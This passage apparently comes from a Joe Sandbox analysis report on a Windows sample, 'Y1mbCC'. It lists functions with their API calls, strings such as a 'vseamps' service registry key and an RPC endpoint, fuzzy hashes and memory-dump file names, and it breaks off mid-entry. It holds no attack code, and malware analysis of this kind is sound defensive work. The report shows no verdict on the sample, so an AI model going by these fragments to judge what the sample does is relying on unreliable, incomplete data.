Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFE148C4804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE148C4861

Part of subcall function 00007FFE148C6BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE148C6C07
Part of subcall function 00007FFE148C6BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE148C6C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE148C4939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE148C4B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE148C4C94

Strings

csm, xrefs: 00007FFE148C487B
csm, xrefs: 00007FFE148C495C
csm, xrefs: 00007FFE148C48E2

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: 1748839b43d5185301018b176072e79e64502abe05399b399b27e8c5cf876e86
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 8BD17232908B4186EB10DF6A94807ED77A0FB56BA8F500275FE4D57BA5CF38E589C740

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFE148CB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE148CB9E8
GetProcAddress.KERNEL32 ref: 00007FFE148CB9F4

Strings

ext-ms-, xrefs: 00007FFE148CB945
api-ms-, xrefs: 00007FFE148CB932

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: 4b0053ee5639d24ca72a52e53d95ff0784c72365ec897a1f493c6e7d2e44273f
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: B5410431B19F0241EA12AB17B890AFA2391BF47BB0F994575ED0D477A4EE3CE44D9300

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

action, xrefs: 0000000140002A52
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ampIfEp, xrefs: 000000014000195E
ncalrpc, xrefs: 000000014000196D
Security=impersonation static true, xrefs: 0000000140001952

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE148C712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE148C72EB,?,?,?,00007FFE148C3EC0,?,?,?,?,00007FFE148C3CFD), ref: 00007FFE148C71B1
GetLastError.KERNEL32(?,?,?,00007FFE148C72EB,?,?,?,00007FFE148C3EC0,?,?,?,?,00007FFE148C3CFD), ref: 00007FFE148C71BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE148C72EB,?,?,?,00007FFE148C3EC0,?,?,?,?,00007FFE148C3CFD), ref: 00007FFE148C71E9
FreeLibrary.KERNEL32(?,?,?,00007FFE148C72EB,?,?,?,00007FFE148C3EC0,?,?,?,?,00007FFE148C3CFD), ref: 00007FFE148C7257
GetProcAddress.KERNEL32(?,?,?,00007FFE148C72EB,?,?,?,00007FFE148C3EC0,?,?,?,?,00007FFE148C3CFD), ref: 00007FFE148C7263

Strings

api-ms-, xrefs: 00007FFE148C71D1

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: c0645b10d51fb44719f7eacc9f96f78f01feaa97e1431bee4e9cc2bede476eab
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: FA31B431A1AF4291EE56AB53A4809F96398BF4BBB4F994575FD1E07360DE3CE4498300

Function 00007FFE148C9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE148C9453
FlsGetValue.KERNEL32 ref: 00007FFE148C9468
FlsSetValue.KERNEL32 ref: 00007FFE148C9489
FlsSetValue.KERNEL32 ref: 00007FFE148C94B6
FlsSetValue.KERNEL32 ref: 00007FFE148C94C7
FlsSetValue.KERNEL32 ref: 00007FFE148C94D8
SetLastError.KERNEL32 ref: 00007FFE148C94F3

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 054c09a1a5eea3bff27b21f18e606e3ee0aaa98b063695045c1c67fd64561d24
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: F9216230A0DE8245FA55A73355D19B961819F4A7B0F9447F4F97E07BF6DE2CB4498300

Function 00007FFE148D0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE148D0131
GetLastError.KERNEL32 ref: 00007FFE148D013D
CloseHandle.KERNEL32 ref: 00007FFE148D0155
CreateFileW.KERNEL32 ref: 00007FFE148D0180
WriteConsoleW.KERNEL32 ref: 00007FFE148D019F

Strings

CONOUT$, xrefs: 00007FFE148D0161

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: 43e75691c29b9847afc1a250ca86b710c2cbc9bc82ea41b28405ff4802e186ac
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: A9115121A19F4186E750AF53E88432972A0FB8ABF4F044274FA5D87BA4CF7CD9498744

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
Help, xrefs: 0000000140001238
10:52:57, xrefs: 000000014000120F
Jul 5 2019, xrefs: 0000000140001216

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
